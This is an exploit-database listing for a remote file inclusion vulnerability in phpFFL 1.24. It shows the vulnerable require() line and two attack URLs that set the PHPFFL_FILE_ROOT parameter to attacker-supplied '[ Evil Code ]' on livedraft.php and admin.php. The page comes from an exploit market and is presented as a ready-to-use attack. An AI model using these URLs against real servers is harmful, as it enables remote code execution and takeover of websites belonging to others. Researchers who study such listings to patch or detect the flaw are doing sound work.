[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

phpFFL 1.24 PHPFFL_FILE_ROOT Remote File Inclusion Vulnerabilities

Author
Dj7xpl
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2135
Category
web applications
Date add
13-09-2007
Platform
unsorted
==================================================================
phpFFL 1.24 PHPFFL_FILE_ROOT Remote File Inclusion Vulnerabilities
==================================================================



*******************************************************************************
# Title    :  phpFFL 1.24  Remote File Inclusion Vulnerability
*******************************************************************************
# Title    :  phpFFL 1.24  Remote File Inclusion Vulnerability
# Author   :  Dj7xpl
# Gr33tZ   :  Y! Underground Group , Ir_R57 , Mehrdad AliZade
*******************************************************************************
Vuln Code:
            require($PHPFFL_FILE_ROOT."program_files/livedraft/sajax.php");
            require($PHPFFL_FILE_ROOT."program_files/livedraft/sajax.php");
 

[[Remote]]]

http://[target]/[path]/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=[ Evil Code ]
http://[target]/[path]/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=[ Evil Code ]

"""""""""""""""""""""



#  0day.today [2024-12-25]  #